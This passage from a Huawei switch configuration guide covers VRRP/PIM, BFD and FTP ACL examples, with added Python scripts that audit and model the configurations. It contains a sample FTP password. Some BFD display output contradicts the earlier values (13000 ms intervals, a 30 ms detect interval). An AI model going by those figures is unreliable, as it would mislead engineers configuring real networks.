ip address 10.1.6.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.6.253
vrrp vrid 2 virtual-ip 10.1.6.254
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
pim sm
pim bfd enable
igmp enable
ospf bfd enable
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 500
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 400
stp disable
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
interface GigabitEthernet2/0/3
eth-trunk 1
#
interface GigabitEthernet3/0/1
port link-type trunk
port trunk allow-pass vlan 303
#
interface GigabitEthernet3/0/2
port link-type trunk
port trunk allow-pass vlan 302
#
interface LoopBack1
ip address 10.4.4.4 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.6.0 0.0.0.255
network 10.4.4.4 0.0.0.0
#
pim
c-bsr LoopBack1
c-rp LoopBack1
#
return
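As an added example (not part of Huawei's document), the following Python audit reads configuration files in the stanza format shown above and checks two properties this design depends on: every VLANIF that runs PIM-SM also has BFD for PIM and BFD for OSPF enabled (roadmap step 6), and each VRRP group has exactly one switch with the raised priority, so the master/backup split that load-balances unicast traffic is fixed by configuration. The sample configurations are constructed excerpts of SwitchA and SwitchB; the default priority of 100 is the PriorityRun value shown in the display vrrp output above.

```python
"""Audit VRP configuration files for the VRRP and BFD properties this example relies on.

Added example, not Huawei's code. It parses the '#'-separated stanzas of the Configuration
Files section and checks that every VLANIF running PIM-SM also has 'pim bfd enable' and
'ospf bfd enable' (roadmap step 6), and that each VRRP group has one unique highest priority.
"""
import re
from collections import defaultdict

DEFAULT_VRRP_PRIORITY = 100  # PriorityRun shown above for the end without 'priority'
VRRP_RE = re.compile(r"vrrp vrid (\d+) (?:virtual-ip (\S+)|priority (\d+))")


def parse_interfaces(config_text):
    """Return {interface_name: [command, ...]} for every 'interface ...' stanza."""
    interfaces, current = {}, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if line == "#":  # stanza separator closes the current block
            current = None
        elif line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif current is not None and line:
            interfaces[current].append(line)
    return interfaces


def missing_bfd(interfaces):
    """(interface, command) pairs where a PIM-SM VLANIF lacks BFD for PIM or for OSPF."""
    findings = []
    for name, cmds in interfaces.items():
        if name.startswith("Vlanif") and "pim sm" in cmds:
            for needed in ("pim bfd enable", "ospf bfd enable"):
                if needed not in cmds:
                    findings.append((name, needed))
    return findings


def vrrp_groups(configs):
    """Map (interface, vrid, virtual-ip) -> {switch: priority} across all switches."""
    groups = defaultdict(dict)
    for switch, text in configs.items():
        for name, cmds in parse_interfaces(text).items():
            vips, prios = {}, {}
            for cmd in cmds:
                m = VRRP_RE.match(cmd)
                if m and m.group(2):
                    vips[int(m.group(1))] = m.group(2)
                elif m:
                    prios[int(m.group(1))] = int(m.group(3))
            for vrid, vip in vips.items():
                groups[(name, vrid, vip)][switch] = prios.get(vrid, DEFAULT_VRRP_PRIORITY)
    return dict(groups)


def expected_masters(groups):
    """Switch with the unique highest priority per group; None when priorities tie, which
    leaves the master to the VRRP address tie-break instead of the intended design."""
    masters = {}
    for key, members in groups.items():
        top = max(members.values())
        winners = [sw for sw, prio in members.items() if prio == top]
        masters[key] = winners[0] if len(winners) == 1 else None
    return masters


# Constructed excerpts of the SwitchA/SwitchB configuration files above; the SwitchB
# Vlanif303 stanza deliberately omits 'ospf bfd enable' so that the audit reports it.
SAMPLE_CONFIGS = {
    "SwitchA": """\
#
interface Vlanif100
 vrrp vrid 1 virtual-ip 10.1.1.253
 vrrp vrid 1 priority 120
 vrrp vrid 1 preempt-mode timer delay 20
 vrrp vrid 2 virtual-ip 10.1.1.254
 pim sm
 pim bfd enable
 ospf bfd enable
#
""",
    "SwitchB": """\
#
interface Vlanif100
 vrrp vrid 1 virtual-ip 10.1.1.253
 vrrp vrid 2 virtual-ip 10.1.1.254
 vrrp vrid 2 priority 120
 pim sm
 pim bfd enable
 ospf bfd enable
#
interface Vlanif303
 pim sm
 pim bfd enable
#
""",
}
```

Running missing_bfd(parse_interfaces(SAMPLE_CONFIGS["SwitchB"])) reports the Vlanif303 gap, and expected_masters(vrrp_groups(SAMPLE_CONFIGS)) returns SwitchA for group 1 and SwitchB for group 2, matching the display vrrp output above.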

11.2 Typical BFD Configuration

11.2.1 Example for Associating the BFD Session Status with the
Interface Status

BFD Overview
A network device must detect a communication fault between adjacent devices quickly so that
measures can be taken immediately and service interruptions can be prevented. In practice,
hardware detection is used to detect link faults. For example, Synchronous Digital Hierarchy
(SDH) alarms are used to report link faults. However, not all media can provide the hardware
detection mechanism. Applications use the Hello mechanism of the upper-layer routing
protocol to detect faults. The detection duration is more than 1 second, which is too long for
some applications. If no routing protocol is deployed on a small-scale Layer 3 network, the
Hello mechanism cannot be used.
BFD provides fast fault detection independent of media and routing protocols. With
millisecond-level fault detection and switching, BFD is suitable for scenarios that are
sensitive to packet loss and delay.

Configuration Notes
l The local discriminator of the local system and the remote discriminator of the remote
system must be the same. If the local discriminator of the local system and the remote
discriminator of the remote system are different, a static BFD session cannot be set up.
After the local discriminator and the remote discriminator are configured, you cannot
modify them.
l If a BFD session is bound to the default multicast address, the local discriminator and the
remote discriminator must be different.
l If the WTR time is set, set the same WTR time at both ends. Otherwise, when the BFD
session status changes at one end, applications at both ends detect different BFD session
statuses.
l The following describes the applicable product models and versions.

Table 11-5 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.
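The discriminator and WTR rules in the Configuration Notes above, checked in code as an added example that is not Huawei's: it parses the BFD session-view commands of both ends and reports the conditions under which a static session cannot be set up. The sample input is the atob/btoa session configuration from Step 2 of this example plus a constructed mismatching variant; the 'wtr' keyword is an assumption, since the page names the WTR time but not its command.

```python
"""Check a pair of static single-hop BFD sessions against the Configuration Notes above.

Added example, not Huawei's code. It reads the BFD session-view commands of both ends
(the 'bfd <name> bind peer-ip ...' line and its 'discriminator local/remote' lines) and
reports why the session could not be set up: the local discriminator of one end must
equal the remote discriminator of the other, and a session bound to the default multicast
address (peer-ip default-ip) must use distinct local and remote discriminators. The 'wtr'
keyword is an assumption: the page names the WTR time but not its command.
"""
import re

PROMPT_RE = re.compile(r"^\[[^\]]*\]\s*")  # '[SwitchA-bfd-session-atob] ' prefix
BIND_RE = re.compile(r"^bfd (\S+) bind peer-ip (\S+)(?: interface (.+))?$")


def parse_bfd_session(cli_lines):
    """Parse one end's session commands into a dict: name, peer, interface, local, remote, wtr."""
    session = dict(name=None, peer=None, interface=None, local=None, remote=None, wtr=None)
    for raw in cli_lines:
        line = PROMPT_RE.sub("", raw.split("//", 1)[0].strip())  # drop prompt and CLI comment
        m = BIND_RE.match(line)
        if m:
            session.update(name=m.group(1), peer=m.group(2), interface=m.group(3))
            continue
        parts = line.split()
        if parts[:2] == ["discriminator", "local"]:
            session["local"] = int(parts[2])
        elif parts[:2] == ["discriminator", "remote"]:
            session["remote"] = int(parts[2])
        elif parts[:1] == ["wtr"]:  # assumed keyword, see module docstring
            session["wtr"] = int(parts[1])
    return session


def check_session_pair(a, b):
    """Return a list of problems; an empty list means the static session can be set up."""
    problems = []
    for end in (a, b):
        if end["local"] is None or end["remote"] is None:
            problems.append(f"{end['name']}: both discriminators must be configured")
    if problems:
        return problems
    # Rule 1: local discriminator of one end == remote discriminator of the other end.
    if a["local"] != b["remote"] or b["local"] != a["remote"]:
        problems.append(
            f"discriminator mismatch: {a['name']} local/remote {a['local']}/{a['remote']} "
            f"vs {b['name']} local/remote {b['local']}/{b['remote']}")
    # Rule 2: with the default multicast address, local and remote must differ on each end.
    for end in (a, b):
        if end["peer"] == "default-ip" and end["local"] == end["remote"]:
            problems.append(f"{end['name']}: a session bound to the default multicast "
                            "address needs distinct local and remote discriminators")
    # Rule 3: if a WTR time is set, both ends must use the same value.
    if a["wtr"] != b["wtr"]:
        problems.append(f"WTR mismatch: {a['wtr']} vs {b['wtr']}; set the same WTR time at both ends")
    return problems


# Session commands as entered on SwitchA and SwitchB in Step 2 of this example.
SWITCH_A = [
    "[SwitchA] bfd atob bind peer-ip default-ip interface gigabitethernet 1/0/1 //Configure a BFD session named atob.",
    "[SwitchA-bfd-session-atob] discriminator local 10",
    "[SwitchA-bfd-session-atob] discriminator remote 20",
]
SWITCH_B = [
    "[SwitchB] bfd btoa bind peer-ip default-ip interface gigabitethernet 1/0/1",
    "[SwitchB-bfd-session-btoa] discriminator local 20",
    "[SwitchB-bfd-session-btoa] discriminator remote 10",
]
# Constructed misconfiguration: SwitchB's remote discriminator does not match SwitchA's local one.
SWITCH_B_BAD = [
    "[SwitchB] bfd btoa bind peer-ip default-ip interface gigabitethernet 1/0/1",
    "[SwitchB-bfd-session-btoa] discriminator local 20",
    "[SwitchB-bfd-session-btoa] discriminator remote 15",
]

if __name__ == "__main__":
    print(check_session_pair(parse_bfd_session(SWITCH_A), parse_bfd_session(SWITCH_B)))
    print(check_session_pair(parse_bfd_session(SWITCH_A), parse_bfd_session(SWITCH_B_BAD)))
```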

Networking Requirements
As shown in Figure 11-6, SwitchA is directly connected to SwitchB at the network layer and
Layer 2 transmission devices, SwitchC and SwitchD, are deployed between them. It is
required that SwitchA and SwitchB fast detect link faults of the Layer 2 transmission devices
to trigger fast route convergence.

Figure 11-6 Associating the BFD session status with the interface status
[Figure: SwitchA (GE1/0/1, VLANIF10, 10.1.1.1/24) - SwitchC - SwitchD - SwitchB (GE1/0/1, VLANIF10, 10.1.1.2/24)]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure a BFD session on SwitchA and SwitchB to detect faults on the link between
SwitchA and SwitchB.
2. Configure association between the BFD session status and interface status on SwitchA
and SwitchB after the BFD session becomes Up.

Procedure
Step 1 Set IP addresses of the directly connected interfaces on SwitchA and SwitchB.
# Assign an IP address to the interface of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 10
[SwitchA-vlan10] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid //In V200R005C00 and later versions, the default link type of an interface is not hybrid; you need to configure it manually.
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 24
[SwitchA-Vlanif10] quit

# Assign an IP address to the interface of SwitchB.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan 10
[SwitchB-vlan10] quit
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type hybrid //In V200R005C00 and later versions, the default link type of an interface is not hybrid; you need to configure it manually.
[SwitchB-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 10
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface vlanif 10
[SwitchB-Vlanif10] ip address 10.1.1.2 24
[SwitchB-Vlanif10] quit

Step 2 Configure single-hop BFD.

# Enable BFD on SwitchA and establish a BFD session named atob between SwitchA and
SwitchB.
[SwitchA] bfd //Enable BFD globally.
[SwitchA-bfd] quit
[SwitchA] bfd atob bind peer-ip default-ip interface gigabitethernet 1/0/1 //Configure a BFD session named atob.
[SwitchA-bfd-session-atob] discriminator local 10 //Configure the local discriminator of the BFD session.
[SwitchA-bfd-session-atob] discriminator remote 20 //Configure the remote discriminator of the BFD session.
[SwitchA-bfd-session-atob] commit
[SwitchA-bfd-session-atob] quit

# Enable BFD on SwitchB and establish a BFD session named btoa between SwitchB and
SwitchA.
[SwitchB] bfd
[SwitchB-bfd] quit
[SwitchB] bfd btoa bind peer-ip default-ip interface gigabitethernet 1/0/1 //Configure a BFD session named btoa.
[SwitchB-bfd-session-btoa] discriminator local 20
[SwitchB-bfd-session-btoa] discriminator remote 10
[SwitchB-bfd-session-btoa] commit
[SwitchB-bfd-session-btoa] quit

# After the configuration is complete, run the display bfd session all verbose command on
SwitchA and SwitchB. You can see that a single-hop BFD session is set up and its status is
Up. The display on SwitchA is used as an example.
[SwitchA] display bfd session all verbose
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Up Name : atob
--------------------------------------------------------------------------------
Local Discriminator : 10 Remote Discriminator : 20
Session Detect Mode : Asynchronous Mode Without Echo Function
BFD Bind Type : Interface(GigabitEthernet1/0/1)
Bind Session Type : Static
Bind Peer Ip Address : 224.0.0.184
NextHop Ip Address : 224.0.0.184
Bind Interface : GigabitEthernet1/0/1
FSM Board Id : 3 TOS-EXP : 7
Min Tx Interval (ms) : 1000 Min Rx Interval (ms) : 1000
Actual Tx Interval (ms): 1000 Actual Rx Interval (ms): 1000
Local Detect Multi : 3 Detect Interval (ms) : 3000
Echo Passive : Disable Acl Number : -
Destination Port : 3784 TTL : 255
Proc interface status : Disable Process PST : Disable
WTR Interval (ms) : -
Active Multi : 3
Last Local Diagnostic : No Diagnostic
Bind Application : No Application Bind
Session TX TmrID : - Session Detect TmrID : -
Session Init TmrID : - Session WTR TmrID : -
Session Echo Tx TmrID : -
PDT Index : FSM-0 | RCV-0 | IF-0 | TOKEN-0
Session Description : -
--------------------------------------------------------------------------------

Total UP/DOWN Session Number : 1/0

Step 3 Configure association between the BFD session status and the interface status.
# Configure association between the BFD session status and the interface status on SwitchA.
[SwitchA] bfd atob
[SwitchA-bfd-session-atob] process-interface-status
[SwitchA-bfd-session-atob] quit

# Configure association between the BFD session status and the interface status on SwitchB.
[SwitchB] bfd btoa
[SwitchB-bfd-session-btoa] process-interface-status
[SwitchB-bfd-session-btoa] quit

Step 4 Verify the configuration.


After the configuration is complete, run the display bfd session all verbose command on
SwitchA and SwitchB. You can see that the Proc interface status field is Enable.
The display on SwitchA is used as an example.
[SwitchA] display bfd session all verbose
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Up Name : atob
--------------------------------------------------------------------------------
Local Discriminator : 10 Remote Discriminator : 20
Session Detect Mode : Asynchronous Mode Without Echo Function
BFD Bind Type : Interface(GigabitEthernet1/0/1)
Bind Session Type : Static
Bind Peer Ip Address : 224.0.0.184
NextHop Ip Address : 224.0.0.184
Bind Interface : GigabitEthernet1/0/1
FSM Board Id : 3 TOS-EXP : 7
Min Tx Interval (ms) : 1000 Min Rx Interval (ms) : 1000
Actual Tx Interval (ms): 13000 Actual Rx Interval (ms): 13000
Local Detect Multi : 3 Detect Interval (ms) : 30
Echo Passive : Disable Acl Number : -
Destination Port : 3784 TTL : 255
Proc interface status : Enable Process PST : Disable
WTR Interval (ms) : -
Active Multi : 3
Last Local Diagnostic : No Diagnostic
Bind Application : IFNET
Session TX TmrID : - Session Detect TmrID : -
Session Init TmrID : - Session WTR TmrID : -
Session Echo Tx TmrID : -
PDT Index : FSM-0 | RCV-0 | IF-0 | TOKEN-0
Session Description : -
--------------------------------------------------------------------------------

Total UP/DOWN Session Number : 1/0

Run the shutdown command on GE1/0/1 of SwitchB to make the BFD session go Down.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] shutdown
[SwitchB-GigabitEthernet1/0/1] quit

Run the display bfd session all verbose and display interface gigabitethernet 1/0/1
commands on SwitchA. You can see that the BFD session status is Down, and the status of
GE1/0/1 is UP (BFD status down).
[SwitchA] display bfd session all verbose
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Down Name : atob
--------------------------------------------------------------------------------
Local Discriminator : 10 Remote Discriminator : 20
Session Detect Mode : Asynchronous Mode Without Echo Function
BFD Bind Type : Interface(GigabitEthernet1/0/1)
Bind Session Type : Static
Bind Peer Ip Address : 224.0.0.184
NextHop Ip Address : 224.0.0.184
Bind Interface : GigabitEthernet1/0/1
FSM Board Id : 3 TOS-EXP : 7
Min Tx Interval (ms) : 1000 Min Rx Interval (ms) : 10
Actual Tx Interval (ms): 13000 Actual Rx Interval (ms): 13000
Local Detect Multi : 3 Detect Interval (ms) : 30
Echo Passive : Disable Acl Number : -
Destination Port : 3784 TTL : 255
Proc interface status : Enable Process PST : Disable
WTR Interval (ms) : -
Active Multi : 3
Last Local Diagnostic : Control Detection Time Expired
Bind Application : IFNET
Session TX TmrID : - Session Detect TmrID : -
Session Init TmrID : - Session WTR TmrID : -
Session Echo Tx TmrID : -
PDT Index : FSM-0 | RCV-0 | IF-0 | TOKEN-0
Session Description : -
--------------------------------------------------------------------------------

Total UP/DOWN Session Number : 0/1


[SwitchA] display interface gigabitethernet 1/0/1
GigabitEthernet1/0/1 current state : UP
Line protocol current state : UP(BFD status down)
...

NOTE

The display interface gigabitethernet 1/0/1 output above shows only the fields of interest;
"..." indicates that the remaining information is omitted.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10
#
bfd
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port hybrid pvid vlan 10
port hybrid untagged vlan 10
#
bfd atob bind peer-ip default-ip interface GigabitEthernet1/0/1
discriminator local 10
discriminator remote 20
process-interface-status
commit
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10
#
bfd
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port hybrid pvid vlan 10
port hybrid untagged vlan 10
#
bfd btoa bind peer-ip default-ip interface GigabitEthernet1/0/1
discriminator local 20
discriminator remote 10
process-interface-status
commit
#
return
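The following Python model is added here as an illustration; it is not Huawei code and not part of this guide. It reproduces what the procedure above exercises: the three-way handshake that brings atob and btoa Up, the RFC 5880 detection time (remote multiplier 3 × 1000 ms = 3000 ms, the Detect Interval field in the display output), the Control Detection Time Expired diagnostic that appears once GE1/0/1 on SwitchB is shut down, and the difference that process-interface-status makes to what display interface reports. The discriminators 10/20 and timer values are the ones configured above; the control packet is reduced to the fields the state machine needs (no authentication, no jitter), which is an assumption of the model.

```python
"""BFD session model after RFC 5880 (added illustration, not Huawei code):
three-way handshake, detection timer, diagnostic codes, and the interface
association that 'process-interface-status' enables. Timer values are the
ones shown in the display output above (Min Tx/Rx 1000 ms, multiplier 3)."""
from dataclasses import dataclass
from typing import Dict

# RFC 5880 section 4.1: session states and diagnostic codes
ADMIN_DOWN, DOWN, INIT, UP = 0, 1, 2, 3
DIAG_NONE, DIAG_DETECT_EXPIRED, DIAG_NEIGHBOR_DOWN = 0, 1, 3
DIAG_NAME = {DIAG_NONE: "No Diagnostic",
             DIAG_DETECT_EXPIRED: "Control Detection Time Expired",
             DIAG_NEIGHBOR_DOWN: "Neighbor Signaled Session Down"}


@dataclass
class BfdSession:
    name: str
    local_disc: int            # discriminator local
    remote_disc: int           # discriminator remote
    min_tx_ms: int = 1000      # Min Tx Interval
    min_rx_ms: int = 1000      # Min Rx Interval
    detect_mult: int = 3       # Local Detect Multi
    process_interface_status: bool = False
    state: int = DOWN
    diag: int = DIAG_NONE
    peer_min_tx_ms: int = 0    # learned from the peer's last control packet
    peer_detect_mult: int = 0
    last_rx_ms: int = 0

    def detection_time_ms(self) -> int:
        """RFC 5880 6.8.4: remote DetectMult x max(local RequiredMinRx, remote DesiredMinTx).
        With 1000/1000/3 this is the 'Detect Interval (ms) : 3000' shown above."""
        return self.peer_detect_mult * max(self.min_rx_ms, self.peer_min_tx_ms)

    def control_packet(self) -> Dict[str, int]:
        return {"state": self.state, "my_disc": self.local_disc, "your_disc": self.remote_disc,
                "min_tx_ms": self.min_tx_ms, "detect_mult": self.detect_mult}

    def receive(self, pkt: Dict[str, int], now_ms: int) -> None:
        """RFC 5880 6.8.6 state machine for one received control packet."""
        # Static session: a packet whose Your Discriminator is neither ours nor 0 is dropped.
        if pkt["your_disc"] not in (0, self.local_disc):
            return
        self.peer_min_tx_ms, self.peer_detect_mult = pkt["min_tx_ms"], pkt["detect_mult"]
        self.last_rx_ms = now_ms
        remote = pkt["state"]
        if remote == ADMIN_DOWN:
            if self.state != DOWN:
                self.state, self.diag = DOWN, DIAG_NEIGHBOR_DOWN
        elif self.state == DOWN:
            if remote == DOWN:
                self.state = INIT
            elif remote == INIT:
                self.state = UP
        elif self.state == INIT:
            if remote in (INIT, UP):
                self.state = UP
        elif self.state == UP and remote == DOWN:
            self.state, self.diag = DOWN, DIAG_NEIGHBOR_DOWN
        if self.state == UP:
            self.diag = DIAG_NONE

    def tick(self, now_ms: int) -> None:
        """Detection timer: no control packet within the detection time brings the session Down."""
        if self.state in (INIT, UP) and now_ms - self.last_rx_ms > self.detection_time_ms():
            self.state, self.diag = DOWN, DIAG_DETECT_EXPIRED

    def line_protocol(self) -> str:
        """What 'display interface' reports for the bound port: the physical link stays UP,
        and only with process-interface-status does the protocol state follow BFD."""
        if self.process_interface_status and self.state != UP:
            return "UP(BFD status down)"
        return "UP"


def bring_up(a: BfdSession, b: BfdSession, now_ms: int = 0) -> None:
    """Exchange control packets until both sides reach Up (Down -> Init -> Up)."""
    for _ in range(3):
        b.receive(a.control_packet(), now_ms)
        a.receive(b.control_packet(), now_ms)


if __name__ == "__main__":
    atob = BfdSession("atob", 10, 20, process_interface_status=True)
    btoa = BfdSession("btoa", 20, 10, process_interface_status=True)
    bring_up(atob, btoa)
    print(atob.name, atob.state, atob.detection_time_ms())
    atob.tick(3001)   # SwitchB's port was shut down: nothing arrives for more than 3000 ms
    print(atob.state, DIAG_NAME[atob.diag], atob.line_protocol())
```

Without process-interface-status the same session going Down leaves the line protocol at UP, which is the state Step 3 is there to change: routing and other applications bound to the interface only react to the BFD failure once the interface status follows it.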

12 Typical Security Configuration

About This Chapter

12.1 Typical ACL Configuration


12.2 Example for Configuring Port Security

12.1 Typical ACL Configuration


12.1.1 Example for Using an ACL to Restrict FTP Access Rights
ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. A basic ACL defines rules to filter IPv4 packets based on information such as
source IP addresses, fragment information, and time ranges. If you only need to filter packets
based on source IP addresses, you can configure a basic ACL.
In this example, a basic ACL is applied to the FTP module to allow only the specified clients
to access the FTP server, improving FTP server security.

Configuration Notes
l In this example, the local user password is stored in irreversible-cipher mode: the
device keeps only a one-way (irreversible) digest of the password, so the plain-text
password cannot be recovered by decrypting what appears in the configuration file. This
is more secure than a reversible cipher.
l This example, excluding the password encryption mode, applies to all versions and
models.

Networking Requirements
As shown in Figure 12-1, the Switch functions as an FTP server. The requirements are as
follows:
l All the users on subnet 1 (172.16.105.0/24) are allowed to access the FTP server
anytime.
l All the users on subnet 2 (172.16.107.0/24) are allowed to access the FTP server only at
the specified period of time.
l Other users are not allowed to access the FTP server.
The routes between the Switch and subnets are reachable. You need to configure the Switch to
limit user access to the FTP server.

Figure 12-1 Using basic ACLs to restrict FTP access rights
(Figure: PC1 172.16.105.111/24, PC2 172.16.107.111/24 and PC3 10.10.10.1/24 reach the
Switch, which acts as the FTP server at 172.16.104.110/24, through the network.)

Procedure
Step 1 Configure a time range.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] time-range ftp-access from 0:0 2014/1/1 to 23:59 2014/12/31 //Create an
absolute time range for an ACL.
[Switch] time-range ftp-access 14:00 to 18:00 off-day //Create a periodic time
range for an ACL. The ftp-access time range is the overlap of the two time ranges.

Step 2 Configure a basic ACL.


[Switch] acl number 2001
[Switch-acl-basic-2001] rule permit source 172.16.105.0 0.0.0.255 //Allow users
on network segment 172.16.105.0/24 to access the FTP server anytime.
[Switch-acl-basic-2001] rule permit source 172.16.107.0 0.0.0.255 time-range ftp-
access //Allow users on network segment 172.16.107.0/24 to access the FTP server
only in the ftp-access time range.
[Switch-acl-basic-2001] rule deny source any //Prevent other users from
accessing the FTP server.
[Switch-acl-basic-2001] quit

Step 3 Configure basic FTP functions.


[Switch] ftp server enable //Enable the FTP server to allow users to log in to
the device through FTP.
[Switch] aaa
[Switch-aaa] local-user huawei password irreversible-cipher SetUesrPasswd@123 //
Configure the FTP user name and password.
[Switch-aaa] local-user huawei privilege level 15 //Set the FTP user level.
[Switch-aaa] local-user huawei service-type ftp //Set the FTP user service type.
[Switch-aaa] local-user huawei ftp-directory flash: //Configure the FTP working
directory.
[Switch-aaa] quit

Step 4 Configure access permissions on the FTP server.


[Switch] ftp acl 2001 //Apply an ACL to the FTP module.

Step 5 Verify the configuration.


Run the ftp 172.16.104.110 command on PC1 (172.16.105.111/24) in subnet 1. PC1 can
connect to the FTP server.
Run the ftp 172.16.104.110 command on PC2 (172.16.107.111/24) in subnet 2 on Monday in
2014. PC2 cannot connect to the FTP server. Run the ftp 172.16.104.110 command on PC2
(172.16.107.111/24) in subnet 2 at 15:00 on Saturday in 2014. PC2 can connect to the FTP
server.

Run the ftp 172.16.104.110 command on PC3 (10.10.10.1/24). PC3 cannot connect to the
FTP server.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
FTP server enable
FTP acl 2001
#
time-range ftp-access 14:00 to 18:00 off-day
time-range ftp-access from 00:00 2014/1/1 to 23:59 2014/12/31
#
acl number 2001
rule 5 permit source 172.16.105.0 0.0.0.255
rule 10 permit source 172.16.107.0 0.0.0.255 time-range ftp-access
rule 15 deny
#
aaa
local-user huawei password irreversible-cipher %^%#uM-!TkAaGB5=$$6SQuw$#batog!R7M_d^!o{*@N9g'e0baw#%^%#
local-user huawei privilege level 15
local-user huawei ftp-directory flash:
local-user huawei service-type ftp
#
return
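The following Python model is added as an illustration; it is not Huawei code and not part of this guide. It re-evaluates ACL 2001 and the ftp-access time range for PC1, PC2 and PC3 at the points in time used in Step 5. It assumes the semantics the example relies on: two time-range statements with the same name intersect (the absolute 2014 window and the periodic off-day window must both hold, bounds inclusive), rule IDs are assigned in steps of 5, and 0.0.0.255 is an inverse (wildcard) mask. Two caveats a practitioner should keep in mind: an ACL on the FTP module filters on the source address only, which is not authentication, and FTP carries the user name and password in clear text, so the FTP server should only be reachable from a management network that untrusted hosts cannot enter.

```python
"""Model of basic ACL 2001 and time range ftp-access from this example.
Added illustration, not Huawei code; the time-range semantics (periodic and
absolute windows under one name intersect, bounds inclusive) are modeled as
the example describes them."""
from datetime import datetime
from ipaddress import IPv4Address
from typing import List, Optional, Tuple

OFF_DAY = (5, 6)                 # Saturday, Sunday in datetime.weekday() terms
WORKING_DAY = (0, 1, 2, 3, 4)


def wildcard_match(addr: str, network: str, wildcard: str) -> bool:
    """Wildcard (inverse) mask: 0 bits must match, 1 bits are ignored.
    0.0.0.255 therefore matches a /24; 0.0.0.0 is an exact host match."""
    a, n, w = (int(IPv4Address(x)) for x in (addr, network, wildcard))
    care = ~w & 0xFFFFFFFF
    return a & care == n & care


class TimeRange:
    """One named time range built from 'time-range NAME ...' lines.
    Several absolute windows are ORed, several periodic windows are ORed,
    and the name is active only when both groups (if present) are satisfied."""

    def __init__(self) -> None:
        self.absolute: List[Tuple[datetime, datetime]] = []
        self.periodic: List[Tuple[Tuple[int, int], Tuple[int, int], Tuple[int, ...]]] = []

    def active(self, t: datetime) -> bool:
        abs_ok = not self.absolute or any(s <= t <= e for s, e in self.absolute)
        hm = (t.hour, t.minute)
        per_ok = not self.periodic or any(
            t.weekday() in days and s <= hm <= e for s, e, days in self.periodic)
        return abs_ok and per_ok


class BasicAcl:
    """Basic ACL (2000-2999): rules match on source IP only, first match wins.
    Rule IDs are assigned in steps of 5 (5, 10, 15 ...) as in the config file."""

    def __init__(self, number: int, step: int = 5) -> None:
        self.number, self.step = number, step
        self.rules: List[Tuple[int, str, str, str, Optional[TimeRange]]] = []

    def rule(self, action: str, source: str = "any", wildcard: str = "0.0.0.0",
             time_range: Optional[TimeRange] = None) -> int:
        rid = self.step * (len(self.rules) + 1)
        self.rules.append((rid, action, source, wildcard, time_range))
        return rid

    def lookup(self, src_ip: str, t: datetime) -> Tuple[Optional[int], Optional[str]]:
        """Return (rule id, action) of the first active matching rule.
        A rule whose time range is inactive is skipped as if it did not exist,
        which is why the example closes the ACL with an explicit 'rule deny':
        without it, PC2 outside ftp-access would match no rule at all."""
        for rid, action, source, wildcard, tr in self.rules:
            if tr is not None and not tr.active(t):
                continue
            if source == "any" or wildcard_match(src_ip, source, wildcard):
                return rid, action
        return None, None


def build_acl_2001() -> BasicAcl:
    """The configuration from Steps 1 and 2, expressed in this model."""
    ftp_access = TimeRange()
    # time-range ftp-access from 0:0 2014/1/1 to 23:59 2014/12/31
    ftp_access.absolute.append((datetime(2014, 1, 1, 0, 0), datetime(2014, 12, 31, 23, 59)))
    # time-range ftp-access 14:00 to 18:00 off-day
    ftp_access.periodic.append(((14, 0), (18, 0), OFF_DAY))
    acl = BasicAcl(2001)
    acl.rule("permit", "172.16.105.0", "0.0.0.255")               # rule 5
    acl.rule("permit", "172.16.107.0", "0.0.0.255", ftp_access)   # rule 10
    acl.rule("deny")                                              # rule 15: deny source any
    return acl


def check(acl: BasicAcl, src_ip: str, when: str) -> Tuple[Optional[int], Optional[str]]:
    """Evaluate a client at a point in time given as 'YYYY-MM-DD HH:MM'."""
    return acl.lookup(src_ip, datetime.strptime(when, "%Y-%m-%d %H:%M"))


if __name__ == "__main__":
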